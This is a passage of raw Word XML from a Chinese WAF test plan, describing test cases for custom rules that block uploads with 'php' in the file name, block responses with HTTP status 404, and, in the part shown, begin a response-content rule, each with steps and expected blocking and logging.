                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68C370C9">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017847CD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="783AF4E1">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08D16157">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="638FF4FC">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24B65219">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E673838">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E4B7C0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_Toc21077833"/>
      <w:bookmarkStart w:id="181" w:name="_Toc81916137"/>
      <w:bookmarkStart w:id="182" w:name="_Toc1775088267"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传文件名匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
      <w:bookmarkEnd w:id="181"/>
      <w:bookmarkEnd w:id="182"/>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25786A1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="596A2C45">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="59314601">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义上传文件名匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="380524B9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="02D4A868">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="334D500F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配上传文件名规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2E870B7A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="385E8C73">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="1E3ED6F2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="45"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BC8BA1C">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="45"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E98A6DB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="45"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点的上传文件名中包含php字段时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1145DB94">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="45"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>浏览器上传后缀名包含php的文件；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40058333">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18A2BBAC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0DD019E5">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="037E201D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="03836A0A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="360685BC">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33454561">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3B5E1622">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6387C644">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6ACE073A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CF824D1">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56A96394">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2383E960">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169CC53E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_Toc81916138"/>
      <w:bookmarkStart w:id="184" w:name="_Toc21077834"/>
      <w:bookmarkStart w:id="185" w:name="_Toc1065679345"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP状态码匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
      <w:bookmarkEnd w:id="184"/>
      <w:bookmarkEnd w:id="185"/>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10228F20">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1747AC4D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="33A9B21B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义HTTP状态码匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3DCF886C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="18D985E2">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6BF1FEF9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配HTTP状态码规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="29B4693D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5DB17BB6">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7CE3E535">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="46"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DDD1844">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="46"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F8C5D7">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="46"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点的HTTP状态码包含4</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">04 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23CA9A7B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="46"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>浏览器访问一个不存在的页面，如http</w:t>
            </w:r>
            <w:r>
              <w:t>://www.site.com/shario/thinkPHPLogin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E951E33">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0CF6FE9F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0936136B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7A93A392">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0B5E695C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7A92C07F">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AEFC4D1">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708D8DA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3FFCA366">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A1543A4">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CD0BE45">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F205925">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3973F924">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31299AAB">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="_Toc21077835"/>
      <w:bookmarkStart w:id="187" w:name="_Toc81916139"/>
      <w:bookmarkStart w:id="188" w:name="_Toc859135435"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应内容匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>
      <w:bookmarkEnd w:id="187"/>
      <w:bookmarkEnd w:id="188"/>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7C8C2DB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="241F5BA1">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="620AEA3B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义响应内容匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="11DA9625">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4BE83B34">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
